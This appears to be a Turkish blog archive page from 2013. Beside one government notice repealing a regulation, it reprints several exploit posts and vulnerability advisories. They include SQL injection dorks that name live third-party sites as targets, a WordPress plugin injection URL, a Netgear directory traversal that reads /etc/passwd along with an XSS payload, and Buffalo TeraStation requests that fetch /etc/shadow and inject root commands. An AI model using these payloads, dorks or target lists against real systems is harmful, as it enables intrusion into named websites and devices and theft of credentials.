Archive for 09 Şubat 2013

admin | 09 Şubat 2013
No comments

İşletme Belgesi Hakkında Yönetmeliğin Yürürlükten Kaldırılmasına Dair Yönetmelik

10 Şubat 2013 PAZAR

Resmî Gazete

Sayı : 28555

YÖNETMELİK

Çalışma ve Sosyal Güvenlik Bakanlığından:

İŞLETME BELGESİ HAKKINDA YÖNETMELİĞİN YÜRÜRLÜKTEN

KALDIRILMASINA DAİR YÖNETMELİK

MADDE 1 – 4/12/2009 tarihli ve 27422 sayılı Resmî Gazete’de yayımlanan İşletme Belgesi Hakkında Yönetmelik yürürlükten kaldırılmıştır.

MADDE 2 – Bu Yönetmelik yayımı tarihinde yürürlüğe girer.

MADDE 3 – Bu Yönetmelik hükümlerini Çalışma ve Sosyal Güvenlik Bakanı yürütür.

Category: Genel | Tags:
admin | 01 Şubat 2013
One comment

Coyote cms_site Sql injection Vulnerability

Coyote cms_site Sql injection Vulnerability

Sql injection on cms website 


he we Goo !! 


Google Dork : 'inurl:cms.php?id="

Demo site:
http://www.fedaso.com/FR/cms.php?id=33
http://www.chateaudeseneffe.be/FR/cms.php?id=8
http://www.matchandplay.eu/cms.php?id=1


# Special Greetz : Mr.Benladen & X-Line & Azar36.Exe & Biksoft & xMjahd & KhalidMoro
Category: Genel | Tags:
admin | 01 Şubat 2013
No comments

WordPress p1m media manager plugin SQL Injection Vulnerability

WordPress p1m media manager plugin SQL Injection açığı ve açık bulucunun açık hakkındaki değerlentirmeleri şu kekildedir;

================================================================================
____ _    _    ____ _  _    ____ _  _ ___  ____ ____ 
|__| |    |    |__| |__|    |__| |_/  |__] |__| |__/ 
|  | |___ |___ |  | |  |    |  | | \_ |__] |  | |  \ 
                                                     
================================================================================
####
# Exploit Title: WordPress p1m media manager plugin SQL Injection Vulnerability
# Author: KinG Of PiraTeS
# Facebook Profile: www.fb.me/cr4ck3d
# Facebeook Page : www.fb.me/serial.crack
# Facebeook Page : www.fb.me/Cars2Luxe
# E-mail:  / 
# Web Site : www.1337day.com | www.inj3ct0rs.com 
# Category:: webapps
# Google Dork: inurl:"/wp-content/plugins/p1m-media-manager/"
# platform : php
# Vendor: NA
# Version: x.x.x
# Security Risk : High
# Tested on: [Windows 7 Edition Intégrale 64bit ]
####


##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | * ------>  KinG Of PiraTeS * The g0bl!n <-------- * | 
# | ------------------------------------------------- < |
###

# 
1)Introduction
2)Vulnerability Description
3)Exploit

>> ----------------------------------------------------------------
1)Introduction
==============
2)Vulnerability Description
===========================

U can inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. 
Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. 
With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

3)Exploit
=========/{Path}/wp-content/plugins/p1m-media-manager/player.php?id=-208


[~] P0c [~] :
============

Vuln file in :

http://Localhost/{Path}/wp-content/plugins/p1m-media-manager/player.php  <<-----|

[~] D3m0 [~] :
=============/wp-content/plugins/p1m-media-manager/player.php?id=295[Inj3ct Here]
http://www.greatdividecalvary.com/wp-content/plugins/p1m-media-manager/player.php?id=208[Inj3ct Here]
.
.

####

Peace From Algeria

####
=================================**Algerians Hackers**===============================================
# Greets To : 
   KedAns-Dz & Caddy-Dz & kalashinkov3 **All Algerians Hackers** , Kondamne ,  errajol ettayeb
   (exploit-id.com) , (1337day.com) , (Sec4ever.com) , (h4ckforu.com) , (alboraaq.com)
   All My Friendz: Hanixpo , Caddy-Dz , Indoushka , Jago-dz ,saoucha , BriscO-Dz
   Over-X , Kha&miX ,Ev!LsCr!pT_Dz , T0xic ,TrOon , Tn_Scorpion , ..others ?___?
=====================================================================================================
Category: Genel | Tags: ,
admin | 01 Şubat 2013
No comments

Netgear SPH200D Multiple Vulnerabilities

Netgear SPH200D Multiple Vulnerabilities

Device Name: SPH200D
Vendor: Netgear
 
============ Vulnerable Firmware Releases: ============
 
Firmware Version : 1.0.4.80
Kernel Version : 4.1-18
Web Server Version : 1.5
 
============ Device Description: ============/product/SPH200D
 
============ Shodan Torks ============
 
Shodan Search: SPH200D
=> Results 337 devices
 
============ Vulnerability Overview: ============
 
* directory traversal:
 
Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.
 
Request:
http://192.168.178.103/../../etc/passwd
 
Response:
HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0
 
root:x:0:0:root:/root:/bin/bash
demo:x:5000:100:Demo User:/home/demo:/bin/bash
nobody:x:65534:65534:Nobody:/htdocs:/bin/bash
 
 
 
If you request a directory you will get a very nice directory listing for browsing through the filesystem:
/../../var/
 
HTTP/1.0 200 OK
Content-type: text/html
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0
 
<H1>Index of ../../var/</H1>
 
<p><a href="/../../var/.">.</a></p>
<p><a href="/../../var/..">..</a></p>
<p><a href="/../../var/.Skype">.Skype</a></p>
<p><a href="/../../var/jffs2">jffs2</a></p>
<p><a href="/../../var/htdocs">htdocs</a></p>
<p><a href="/../../var/cnxt">cnxt</a></p>
<p><a href="/../../var/ppp">ppp</a></p>
<p><a href="/../../var/conf">conf</a></p>
<p><a href="/../../var/bin">bin</a></p>
<p><a href="/../../var/usr">usr</a></p>
<p><a href="/../../var/tmp">tmp</a></p>
 
So with this information you are able to access the skype configuration with the following request:
/../../var/.Skype/<user>/config.xml
 
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/LFI-01.preview.png
 
* For changing the current password there is no request to the current password
 
With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.
 
* local path disclosure:
 
Request:
http://192.168.178.103/%3C/
 
Response:
The requested URL '/var/htdocs/%3C/' was not found on this server.
 
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/local-path-disclosure.png
 
 
* reflected Cross Site Scripting
 
Appending scripts to the URL reveals that this is not properly validated for malicious input.
http://192.168.178.102/network-dhcp.html4f951<script>alert(1)</script>e51c012502f
 
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/XSSed-IE6.png
 
 
============ Solution ============
 
No known solution available.
 
============ Credits ============
 
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-002
Twitter: 
 
============ Time Line: ============
 
August 2012 - discovered vulnerability
07.08.2012 - reported vulnerability to Netgear
08.08.2012 - case closed by Netgear
29.01.2013 - public release
 
===================== Advisory end =====================
Category: Genel | Tags:
admin | 01 Şubat 2013
No comments

Buffalo TeraStation TS-Series – Multiple Vulnerabilities

Buffalo TeraStation TS-Series – Genel Açıkları

**************************************************************
Title: Buffalo TeraStation TS-Series multiple vulnerabilities
Version affected: firmware version <= 1.5.7
Vendor: http://www.buffalotech.com/products/network-storage
Discovered by: Andrea Fabrizi
Email: andrea.fabrizi () gmail com
Web: http://www.andreafabrizi.it
Twitter: 
Status: unpatched
**************************************************************

Buffalo's TeraStation network attached storage (NAS) solutions offer
centralized storage and backup for home, small office and business
needs.

The firmware is based on Linux ARM and most of the internal software
is written using Perl.

The vulnerabilities that I found allows any unauthenticated attacker
to access arbitrary files on the NAS filesystem and execute system
commands with root privileges.

Tested successfully on TS-XL, TS-RXL, TS-WXL, TS-HTGL/R5, TS-XEL with
the latest firmware installed (v1.57). Surely other versions with the
same firmware are vulnerable.

1]======== sync.cgi unauthenticated arbitrary file download ========
Requesting an unprotected cgi, it's possible, for an unauthenticated
user, to download any system file, included /etc/shadow, that contains
the password shadows for the application/system users.

/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=/etc/shadow

Moreover, using the key "all" it's possible to download the entire
/var/log directory:

/cgi-bin/sync.cgi?gSSS=foo&gRRR=foo&gPage=information&gMode=log&gType=save&gKey=all

2]======== dynamic.pl NTP command injection ========
This vulnerability allows authenticated users to execute arbitrary
commands on the system with root privileges.

This is a sample request:
#####################################
POST /dynamic.pl HTTP/1.1
Content-Length: 89
Cookie: webui_session_admin=xxxxxxxxxxxxxxxxxxxxxx_en_0

bufaction=setDTSettings&dateMethod=on
&ip=www.google.it%26%26[COMMAND]>/tmp/output
&syncFreq=1d
#####################################

It's possible to view the command output using the previous
vulnerability (reading the /tmp/output file).
Category: Genel | Tags:
  Recent Entries »